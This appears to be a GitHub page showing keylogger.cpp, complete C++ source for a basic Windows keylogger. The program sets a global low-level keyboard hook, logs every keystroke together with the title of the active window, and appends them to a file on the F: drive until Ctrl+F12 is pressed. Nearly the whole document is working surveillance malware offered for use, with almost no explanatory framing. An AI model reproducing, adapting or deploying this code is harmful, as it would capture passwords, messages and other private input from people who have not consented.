-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathkeylogger.cpp
214 lines (205 loc) · 7.41 KB
/
keylogger.cpp
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
/************************************************************
* A very basic Key logger in C++
* Author: Manish
* Home: http://technoslab.blogspot.com/search/label/projects
************************************************************/
// Include header files
#include <windows.h>
#include <fstream>
// Initialize a keyboard HHOOK
HHOOK KeyboardHook;
// Function to write to a file
void write(const char* c)
{
const char* fileLocation = "F:\\log.txt"; // Define the location of log file
FILE *f = fopen(fileLocation,"a+"); // Open the log file in append mode
if(f!=NULL)
{
fputs(c,f); // Write to end of the file
fclose(f); // Close the file
}
}
// The WIN API Message Loop
void KeepAlive()
{
MSG message;
while (GetMessage(&message,NULL,0,0))
{
TranslateMessage(&message);
DispatchMessage(&message);
}
}
// Unhook and exit
void Exit()
{
UnhookWindowsHookEx(KeyboardHook);
exit(0);
}
// Is shift key down ?
bool shift = false;
// Store window
HWND oldWindow = NULL;
// Window text
char cWindow[MAX_PATH];
// Callback function to be hooked
LRESULT CALLBACK keyboardHookProc(int nCode, WPARAM wParam, LPARAM lParam)
{
bool bControlKeyDown=0;
// Get current state of capsLock
bool caps = GetKeyState(VK_CAPITAL) < 0;
KBDLLHOOKSTRUCT *p = (KBDLLHOOKSTRUCT *) lParam;
if(nCode == HC_ACTION){
// Determine the current state of shift key
if(p->vkCode == VK_LSHIFT || p->vkCode == VK_RSHIFT){
if(wParam == WM_KEYDOWN)
{
shift = true;
}
else
{
shift = false;
}
}
// Check if F12 + CTRL is pressed, if yes -> exit
bControlKeyDown = GetAsyncKeyState (VK_CONTROL) >> ((sizeof(SHORT) * 8) - 1);
if (p->vkCode == VK_F12 && bControlKeyDown) // If F12 and CTRL are pressed
{
Exit();
}
// Start logging keys
if(wParam == WM_SYSKEYDOWN || wParam == WM_KEYDOWN) // If key has been pressed
{
HWND newWindow = GetForegroundWindow();
if(oldWindow == NULL || newWindow != oldWindow){
// Get Active window title and store it
GetWindowTextA(GetForegroundWindow(), cWindow, sizeof(cWindow));
write("\nActive Window: ");
write(cWindow);
write("\n");
oldWindow = newWindow;
}
// Virtual key codes reference: http://msdn.microsoft.com/en-us/library/dd375731%28v=VS.85%29.aspx
switch(p->vkCode) // Compare virtual keycode to hex values and log keys accordingly
{
//Number keys
case 0x30: write(shift?")":"0");break;
case 0x31: write(shift?"!":"1");break;
case 0x32: write(shift?"@":"2");break;
case 0x33: write(shift?"#":"3");break;
case 0x34: write(shift?"$":"4");break;
case 0x35: write(shift?"%":"5");break;
case 0x36: write(shift?"^":"6");break;
case 0x37: write(shift?"&":"7");break;
case 0x38: write(shift?"*":"8");break;
case 0x39: write(shift?"(":"9");break;
// Numpad keys
case 0x60: write("0");break;
case 0x61: write("1");break;
case 0x62: write("2");break;
case 0x63: write("3");break;
case 0x64: write("4");break;
case 0x65: write("5");break;
case 0x66: write("6");break;
case 0x67: write("7");break;
case 0x68: write("8");break;
case 0x69: write("9");break;
// Character keys
case 0x41: write(caps?(shift?"a":"A"):(shift?"A":"a"));break;
case 0x42: write(caps?(shift?"b":"B"):(shift?"B":"b"));break;
case 0x43: write(caps?(shift?"c":"C"):(shift?"C":"c"));break;
case 0x44: write(caps?(shift?"d":"D"):(shift?"D":"d"));break;
case 0x45: write(caps?(shift?"e":"E"):(shift?"E":"e"));break;
case 0x46: write(caps?(shift?"f":"F"):(shift?"F":"f"));break;
case 0x47: write(caps?(shift?"g":"G"):(shift?"G":"g"));break;
case 0x48: write(caps?(shift?"h":"H"):(shift?"H":"h"));break;
case 0x49: write(caps?(shift?"i":"I"):(shift?"I":"i"));break;
case 0x4A: write(caps?(shift?"j":"J"):(shift?"J":"j"));break;
case 0x4B: write(caps?(shift?"k":"K"):(shift?"K":"k"));break;
case 0x4C: write(caps?(shift?"l":"L"):(shift?"L":"l"));break;
case 0x4D: write(caps?(shift?"m":"M"):(shift?"M":"m"));break;
case 0x4E: write(caps?(shift?"n":"N"):(shift?"N":"n"));break;
case 0x4F: write(caps?(shift?"o":"O"):(shift?"O":"o"));break;
case 0x50: write(caps?(shift?"p":"P"):(shift?"P":"p"));break;
case 0x51: write(caps?(shift?"q":"Q"):(shift?"Q":"q"));break;
case 0x52: write(caps?(shift?"r":"R"):(shift?"R":"r"));break;
case 0x53: write(caps?(shift?"s":"S"):(shift?"S":"s"));break;
case 0x54: write(caps?(shift?"t":"T"):(shift?"T":"t"));break;
case 0x55: write(caps?(shift?"u":"U"):(shift?"U":"u"));break;
case 0x56: write(caps?(shift?"v":"V"):(shift?"V":"v"));break;
case 0x57: write(caps?(shift?"w":"W"):(shift?"W":"w"));break;
case 0x58: write(caps?(shift?"x":"X"):(shift?"X":"x"));break;
case 0x59: write(caps?(shift?"y":"Y"):(shift?"Y":"y"));break;
case 0x5A: write(caps?(shift?"z":"Z"):(shift?"Z":"z"));break;
// Special keys
case VK_SPACE: write(" "); break;
case VK_RETURN: write("\n"); break;
case VK_TAB: write("\t"); break;
case VK_ESCAPE: write("[ESC]"); break;
case VK_LEFT: write("[LEFT]"); break;
case VK_RIGHT: write("[RIGHT]"); break;
case VK_UP: write("[UP]"); break;
case VK_DOWN: write("[DOWN]"); break;
case VK_END: write("[END]"); break;
case VK_HOME: write("[HOME]"); break;
case VK_DELETE: write("[DELETE]"); break;
case VK_BACK: write("[BACKSPACE]"); break;
case VK_INSERT: write("[INSERT]"); break;
case VK_LCONTROL: write("[CTRL]"); break;
case VK_RCONTROL: write("[CTRL]"); break;
case VK_LMENU: write("[ALT]"); break;
case VK_RMENU: write("[ALT]"); break;
case VK_F1: write("[F1]");break;
case VK_F2: write("[F2]");break;
case VK_F3: write("[F3]");break;
case VK_F4: write("[F4]");break;
case VK_F5: write("[F5]");break;
case VK_F6: write("[F6]");break;
case VK_F7: write("[F7]");break;
case VK_F8: write("[F8]");break;
case VK_F9: write("[F9]");break;
case VK_F10: write("[F10]");break;
case VK_F11: write("[F11]");break;
case VK_F12: write("[F12]");break;
// Shift keys
case VK_LSHIFT: break; // Do nothing
case VK_RSHIFT: break; // Do nothing
// Symbol keys
case VK_OEM_1: write(shift?":":";");break;
case VK_OEM_2: write(shift?"?":"/");break;
case VK_OEM_3: write(shift?"~":"`");break;
case VK_OEM_4: write(shift?"{":"[");break;
case VK_OEM_5: write(shift?"|":"\\");break;
case VK_OEM_6: write(shift?"}":"]");break;
case VK_OEM_7: write(shift?"\"":"'");break;
case VK_OEM_PLUS: write(shift?"+":"=");break;
case VK_OEM_COMMA: write(shift?"<":",");break;
case VK_OEM_MINUS: write(shift?+"_":"-");break;
case VK_OEM_PERIOD: write(shift?">":".");break;
default:
DWORD dwMsg = p->scanCode << 16;
dwMsg += p->flags << 24;
char key[16];
GetKeyNameText(dwMsg,key,15);
write(key);
break;
}
}
}
// Forward the event to other hooks
return CallNextHookEx(NULL,nCode,wParam,lParam);
}
// WinAPI main method
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nShowCmd)
{
// Write to file
write("\n---------------------------------------------------------");
// Hook to all available threads
KeyboardHook = SetWindowsHookEx(WH_KEYBOARD_LL, keyboardHookProc, hInstance, NULL);
if(KeyboardHook!=NULL)
{
// Keep alive till F12 + CTRL key press is detected - can also register Hotkey
KeepAlive();
}
// Exit the program
return 0;
}